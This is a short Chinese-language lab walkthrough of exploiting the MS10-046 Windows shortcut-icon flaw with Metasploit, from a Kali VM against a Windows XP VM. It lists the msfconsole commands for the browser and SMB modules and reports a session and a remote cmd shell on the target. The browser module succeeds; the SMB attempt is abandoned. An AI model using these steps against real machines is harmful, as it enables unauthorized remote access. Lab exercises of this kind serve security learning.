本实验在虚拟机环境下进行!!!
准备:
Kali 192.168.88.105
Xp 192.168.88.106
这个是一个图标漏洞,所以我们只需要设置好参数,等待靶机访问即可
进入msfconsole
search ms10_046 查找相应的模块
这里可以看到,有两个可用于攻击的模块,但一个是browser一个是smb,我们先试试browser的行不行
使用模块
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
查看可以渗透的目标
show targets
看到是Automatic,说明都可以
查看选项参数
show options
可以看到,默认已经把参数设置好了,我们只管run即可
run执行
可以看到,他说发送了客户端在\\192.168.88.105\LNivjPN\这个地址上
我们用xp来访问一下
就两个看起来与世无争的小东西
但我们的kali涌出了大量信息
那么大一段字不重要,重要的是箭头所指处,session会话已经建立
我们sessions来看看现在建立了那些会话
可以看到,sessions列表中已经有了我们的xp了
我们用sessions -i 1来连接xp
可以看到,已经连接成功了
我们使用shell来获取xp的shell
看到命令提示符已经变成了window下的cmd了,说明渗透成功
再试试另一个模块可不可以
use exploit/windows/smb/ms10_046_shortcut_icon_dllloader
run 执行
可以看到,它说要去访问\\192.168.88.105\WUMiC\EbWWhz.dll这个路径
我们进入xp,进行访问
打开方式选记事本,可以看到,kali那里返回了信息
他说那个lnk文件也必须被发送
这个两个文件分开的,不太好弄,不如上一个模块。所以我们ctrl+c停止运行,不使用这个模块了。。。